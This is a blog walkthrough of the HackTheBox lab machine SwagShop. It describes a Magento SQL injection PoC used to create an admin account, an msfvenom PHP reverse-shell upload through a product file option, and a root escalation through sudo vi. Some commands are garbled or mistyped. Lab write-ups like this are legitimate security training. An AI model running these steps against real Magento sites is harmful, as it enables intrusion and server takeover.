HackTheBox | SwagShop Walkthrough

. 8 min read . Written by Nautilus
HackTheBox | SwagShop Walkthrough

I took a small break from doing active machines on HackTheBox while working and writing up some retired ones. SwagShop is my first machine after my very small hiatus, and is rated as "easy" difficulty. SwagShop requires enumeration skills, problem solving, and a little bit of perseverance.  

Recon and Making Some Spicy Credentials

To begin this machine let's do a basic nmap scan:

nmap -sC -sV 10.10.10.140
-sC: equivalent to --script=default
-sV: Probe open ports to determine service/version info

Looks like we only have two ports - ssh, and a web server. Let's browse to 10.10.10.140 and see if there's anything to help us gaining a foothold:

Upon browsing to the site we're presented with a store page. This page has three products, and upon creating an account I found nothing interesting. Let's use dirb  to see if we can find anything:

dirb http://10.10.10.140 /usr/share/wordlists/dirb/small.txt

I didn't find anything too interesting from a quick glance at these directories. However, upon further inspection I found that the Magento icon at the top of the page redirected to:

http://10.10.10.140/index.php/

Let's put this newly found url into dirb and see if we find anything different:

dirb http://10.10.10.140/index.php/ /usr/share/wordlists/dirb/small.txt

From these results we find an admin login. Let's browse over to it and see if we can try some default credentials:

I tried a few default credentials such as admin:admin, administrator:password, and so on. However, I decided to finally google Magento admin panel exploits:

After a little research I found out that Magento fell victim to a SQLi attack which was allowing attackers to create new administrator credentials such as ypwq:123. This all sounded great so I decided to look for a PoC:

https://github.com/joren485/Magento-Shoplift-SQLI

Great - now we have a name, and a plan. Let's clone this repository and see if it works:

git clone https://github.com/joren485/Magento-Shoplift-SQLI

Now let's take a look at the code to see if we need to specify anything:

It looks like we just need to specify a target. Let's try running the script first and make any changes we need to if it fails:

Oh.. It worked. Let's try and login with the credentials we've made:

We've successfully logged into the administrator panel!

Popping a Shell and Finding User.txt

Since I found so many vulnerabilities earlier when searching for a way to access the Mangeto admin panel, I decided to look up vulnerabilities to pop a shell. This little search led me to a YouTube video:

Basically, this video shows you uploading a spooky banned plugin to open up an administrator IDE, and then paste your shell in that way. Let's download this random file from a YouTube description and see if it works... Seems legit.

In the YouTube video we see our hackerman go to the following - System --> Magneto Connect --> Magneto Connect Manager - upon browsing to the connect manager we're presented with a login page which accepts our newly created credentials:

Now we're going to want to upload our File_System-1.0.0.tgz file and click upload:

Upon hitting upload we're presented with the following:

Sadly, we're experiencing an error when uploading this file. I looked around for solutions but couldn't find anything. Also it looks like we broke the site:

Yikes, sorry. After looking into a few new exploits, and searching scouring the internet for the good stuff I came across the following link:

https://blog.scrt.ch/2019/01/24/magento-rce-local-file-read-with-low-privilege-admin-rights/

This blog post discusses a vulnerability that allows a .php file to be uploaded.. That sounds really good. I wasn't able to find anywhere on the site that allowed me to upload a .php file so this might be a good lead.

Our first step as a logged in user is to "create a new product, with a new "Custom Options" of type "File", with .phtml as an authorized extension and some pieces in stock to order one".

To do so we're going to want to click on "Catalog" and then click on "Add Product". Although there are more options such as inventory, product description, and the product price - we're only concerned with the "input type:file", and "allowed file extensions:.phtml". Your "New Product - Custom Options" should look like this:

After browsing to the frontend we can see our newly created product:

Our next step is to click on our newly created product and upload a .phtml reverse shell. This can be quickly created using msfvenom:

nmap -sC -sV 10.10.10.5msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.phtml

Now we're going to want to upload example.phtml and add our product with the attached file to our cart:

After doing so we can view the product with our shell in our shopping cart:

Before going any further let's set up a handler in metasploit to catch our shell when it pops:

Now the final step to popping our shell is to browse to where the .phtml shell has been uploaded. An example of this is listed in the blog post:

/your/path/to/magento/pub/media/custom_options/quote/firstLetterOfYourOriginalFileName/secondLetterOfYourOriginalFileName/md5(contentOfYourPhtmlFile).phtml

After tinkering with the example a little, our url should look like this:

10.10.10.140/pub/media/custom_options/quote/e/x/c4aa65039d2df2215225eef74174fe79.phtml

Let's load this up in our web browser:

That didn't work for some reason. Let's try deleting /pub/ from the url and then loading it:

http://10.10.10.140/media/custom_options/quote/e/x/c4aa65039d2df2215225eef74174fe79.phtml

Sweet! That worked. Now let's check our handler:

Just like that we are in:

Now let's look for the user.txt flag. Let's browse to /home/ and see if there's any users:

Now let's cd into haris and check if we can find the user.txt flag:

And just like that - we can read, and submit the user.txt flag!

Privilege Escalation and Root.txt

Let's make enumeration simple by uploading, and running LinEnum.sh to the machine. We can accomplish this with a SimpleHTTPServer hosting LinEnum.sh:

From here we only have to wget it from the target machine:

Now let's run LinEnum.sh with thorough tests enabled:

bash LinEnum.sh -t 1

I couldn't find anything too interesting in the results (I probably overlooked something), so I started to enumerate manually.

Running sudo -l shows us the following:

Looks like we're able to run /usr/bin/vi in /var/www/html/* - let's try running that exact command as sudo and see what happens:

sudo /sr/bin/vi /var/www/html/*

This is looking good - let's try and escape this shell by typing:

!:/bin/sh 

As we can see - the exploit worked and we successfully gained access to a root shell. Let's navigate to /root/ and grab the flag now:

Final Thoughts

I thought this machine was pretty straightforward. Although I can see user.txt being hard to some, root.txt was extremely straightforward with proper enumeration. I think the path was pretty clear the whole way through the machine, and there weren't any major 'rabbit holes'. Finally, I this machine had a nice little surprise at the end.. If you haven't completed it yet then I recommend you give it a shot to see what the surprise is!

Thanks for reading! I hope this post helped you own, and get a better understanding of SwagShop!